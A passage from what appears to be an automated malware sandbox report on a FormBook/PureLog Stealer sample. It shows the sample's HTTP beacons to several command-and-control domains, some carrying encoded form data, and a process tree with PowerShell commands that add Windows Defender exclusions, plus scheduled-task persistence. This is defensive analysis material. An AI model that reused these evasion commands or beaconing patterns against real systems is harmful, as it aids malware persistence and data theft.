                                                                        39 | 192.168.2.5 | 50021 | 52.60.87.163 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:30.232676029 CET | 1839 | OUT | POST /jcsf/ HTTP/1.1
                                                                        Host: www.carpentry.club
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.carpentry.club
                                                                        Referer: http://www.carpentry.club/jcsf/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:31.380040884 CET | 295 | IN | HTTP/1.1 405 Not Allowed
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:31 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 150
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        40 | 192.168.2.5 | 50022 | 52.60.87.163 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:32.883420944 CET | 544 | OUT | GET /jcsf/?QhKxhNP=NJIOohqps9aNaGk8Gv0x95TXV1ke4jY2ru9PIld0z7+iuCSmXzhmM46cxc5xGqvTMH7YV8ukdWwIlgb06ERZu+HhQde6PspHhBqQKwPZwv/EXFgjFQrkOjXlWxa7+IRGPg==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.carpentry.club
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:34.075501919 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 17692
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: max-age=604800
                                                                        Expires: Sun, 01 Dec 2024 08:16:31 +0000
                                                                        Content-Security-Policy: default-src 'self' 'unsafe-inline' https://park.101datacenter.net https://*.deviceatlascloud.com/ https://cs.deviceatlas-cdn.com data:
                                                                        Access-Control-Allow-Origin: https://park.101datacenter.net
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Cached: HIT
                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="en" ><head><title>Future home of carpentry.club</title><meta name="description" content="Domain Name Registration - register your domain name online,and get the name you want while it's still available. Internet Domain Registration & International Domain Name Registration."><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0" /><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /><meta name="robots" content="index, follow" /><meta name="googlebot" content="index, follow" /><meta NAME="revisit-after" CONTENT="15 days"><script type="text/javascript">resource_url = decodeUR


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        41 | 192.168.2.5 | 50023 | 161.97.142.144 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:40.030689955 CET | 799 | OUT | POST /cfqm/ HTTP/1.1
                                                                        Host: www.030002449.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.030002449.xyz
                                                                        Referer: http://www.030002449.xyz/cfqm/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        42 | 192.168.2.5 | 50024 | 161.97.142.144 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:42.705497026 CET | 819 | OUT | POST /cfqm/ HTTP/1.1
                                                                        Host: www.030002449.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.030002449.xyz
                                                                        Referer: http://www.030002449.xyz/cfqm/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:43.983979940 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:43 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        43 | 192.168.2.5 | 50025 | 161.97.142.144 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:45.385179043 CET | 1836 | OUT | POST /cfqm/ HTTP/1.1
                                                                        Host: www.030002449.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.030002449.xyz
                                                                        Referer: http://www.030002449.xyz/cfqm/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:46.601273060 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:46 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        44 | 192.168.2.5 | 50026 | 161.97.142.144 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:48.036974907 CET | 543 | OUT | GET /cfqm/?QhKxhNP=FHiNz6b6Wn9oKec3i10x/NxXWu4/t8kjzDy3bn44oOFoUWscXE4DzqYFgJdNnLXTrdZ+ESI+3Oq4E1BzotELfZv0FR4L9xniphkEx7BDvvGrYDhvMkPmWTEebCLVzsH5Qg==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.030002449.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:49.317785025 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:49 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 2966
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: "66cce1df-b96"


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        45 | 192.168.2.5 | 50027 | 75.2.103.23 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:55.232443094 CET | 820 | OUT | POST /4ia5/ HTTP/1.1
                                                                        Host: www.innovationpulse.tech
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.innovationpulse.tech
                                                                        Referer: http://www.innovationpulse.tech/4ia5/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        46 | 192.168.2.5 | 50028 | 75.2.103.23 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:16:57.901714087 CET | 840 | OUT | POST /4ia5/ HTTP/1.1
                                                                        Host: www.innovationpulse.tech
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.innovationpulse.tech
                                                                        Referer: http://www.innovationpulse.tech/4ia5/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        47 | 192.168.2.5 | 50029 | 75.2.103.23 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:17:00.562285900 CET | 1857 | OUT | POST /4ia5/ HTTP/1.1
                                                                        Host: www.innovationpulse.tech
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.innovationpulse.tech
                                                                        Referer: http://www.innovationpulse.tech/4ia5/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 6c 52 53 48 77 36 34 6e 2b 38 50 6a 4c 65 65 76 31 35 4f 66 73 73 45 4b 69 5a 78 6d 58 56 66 31 4e 32 58 32 79 42 64 6c 79 71 6a 70 41 41 4e 33 69 71 6e 73 54 4d 62 68 59 43 65 52 6e 69 67 6f 4a 33 2b 4b 51 68 6b 55 46 37 31 47 71 64 6c 37 4d 63 6f 63 62 58 67 32 4d 2b 4c 59 51 57 73 72 38 34 6a 67 58 4f 63 2f 50 4c 49 6b 55 41 36 31 4a 52 4e 6a 73 32 62 6d 2f 70 6e 66 32 2b 51 43 6b 75 4c 57 63 53 73 68 45 75 2f 63 53 79 59 4d 55 4e 54 6a 54 54 6f 67 73 5a 2f 56 41 53 44 4d 4b 65 71 59 56 6a 4c 53 58 43 38 48 36 74 64 54 38 66 67 46 6a 70 74 32 53 33 51 6e 72 55 68 45 6a 6b 30 33 58 4a 39 64 76 56 54 38 68 70 70 52 65 2f 63 54 65 64 78 55 32 42 68 57 34 71 48 56 4f 78 42 70 56 56 66 30 34 42 64 2f 50 4e 5a 66 47 63 4b 6d 77 43 32 37 54 51 34 55 4a 6b 56 49 79 54 64 50 36 35 75 79 56 56 6d 56 34 61 65 53 32 34 6f 67 36 58 55 52 70 68 65 78 77 4e 6e 73 63 75 30 46 41 4f 57 4e 52 34 37 32 4b 56 68 43 6a 41 61 50 34 30 30 30 37 37 6c 51 54 71 58 66 65 53 61 52 4c 4f 4a 6a 6f 34 [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        48 | 192.168.2.5 | 50030 | 75.2.103.238 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:17:03.241503000 CET | 550 | OUT | GET /4ia5/?Yby=d2ydCtHpb8&QhKxhNP=oT6nzMsk5LGNbZnpqYupld8IqKtrWX3IcFzU22s19J/vOzFqssjWYMTSR1XNlBsCMk+VGX4Yc+V3gPgjU/YcbzdAUc79Tjp71o7bTfkvAIZVHxyoJSYvjU3Ey8bm4rBe7Q== HTTP/1.1
                                                                        Host: www.innovationpulse.tech
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:17:04.372782946 CET | 410 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 28 Nov 2024 08:17:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 270
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yby=d2ydCtHpb8&QhKxhNP=oT6nzMsk5LGNbZnpqYupld8IqKtrWX3IcFzU22s19J/vOzFqssjWYMTSR1XNlBsCMk+VGX4Yc+V3gPgjU/YcbzdAUc79Tjp71o7bTfkvAIZVHxyoJSYvjU3Ey8bm4rBe7Q=="}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        49 | 192.168.2.5 | 50031 | 13.248.169.48 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:17:10.467845917 CET | 793 | OUT | POST /tur7/ HTTP/1.1
                                                                        Host: www.hasan.cloud
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hasan.cloud
                                                                        Referer: http://www.hasan.cloud/tur7/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=dNtY0EKZN9MdcYsbB0W/rnCpS55fdXHbBeeRCQLlyTdyn1AfZ2jmuu6R5iEKtVSje15FbBRHQv5sae/ymllRvsUj9RBsGfvdRgfx4cHy7cs1F00DbmOP6WSRY6XD1DjW5kQ03M3Ayk6/u7I8thX3S476aAQ5O6fOVTH55g0OmBbALrdrLJDNfTvqkXzp89J3MMa+arg=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        50 | 192.168.2.5 | 50032 | 13.248.169.48 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:17:13.527771950 CET | 813 | OUT | POST /tur7/ HTTP/1.1
                                                                        Host: www.hasan.cloud
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hasan.cloud
                                                                        Referer: http://www.hasan.cloud/tur7/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=dNtY0EKZN9Mdd5cbDT6/tHCqR55fU3HfBeaRCRPPyFNymRMfY0Lmpu6RtSELg1SSe10ybBdHQvtsacXym2NSu8UloBBuI/vdRgfx4cTM7aE1FFEDJXOOw2TjRaXDxDjS5kQs3OSlymy/u648tVD0JI78HwR5N4Wrb1fKmRVx1C/+KdsBRrLlMzDS0E7etNoeWvKOE80/CyVLyX+ck8LsYXUsX6f7


                                                                        Target ID:0
                                                                        Start time:03:13:05
                                                                        Start date:28/11/2024
                                                                        Path:C:\Users\user\Desktop\Documents.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Documents.exe"
                                                                        Imagebase:0xee0000
                                                                        File size:929'800 bytes
                                                                        MD5 hash:0C0B6ED60E0309998DA4AE71469F1D84
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"
                                                                        Imagebase:0x850000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"
                                                                        Imagebase:0x850000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp"
                                                                        Imagebase:0xda0000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:03:13:14
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                        Imagebase:0xa60000
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:03:13:14
                                                                        Start date:28/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                                                                        Imagebase:0x620000
                                                                        File size:929'800 bytes
                                                                        MD5 hash:0C0B6ED60E0309998DA4AE71469F1D84
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 24%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:03:13:16
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                        Imagebase:0x7ff6ef0c0000
                                                                        File size:496'640 bytes
                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:13
                                                                        Start time:03:13:24
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp"
                                                                        Imagebase:0xda0000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:14
                                                                        Start time:03:13:24
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:15
                                                                        Start time:03:13:24
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                        Imagebase:0x710000
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:16
                                                                        Start time:03:13:28
                                                                        Start date:28/11/2024
                                                                        Path:C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe"
                                                                        Imagebase:0xe20000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        Target ID:17
                                                                        Start time:03:13:29
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\systray.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\systray.exe"
                                                                        Imagebase:0x9f0000
                                                                        File size:9'728 bytes
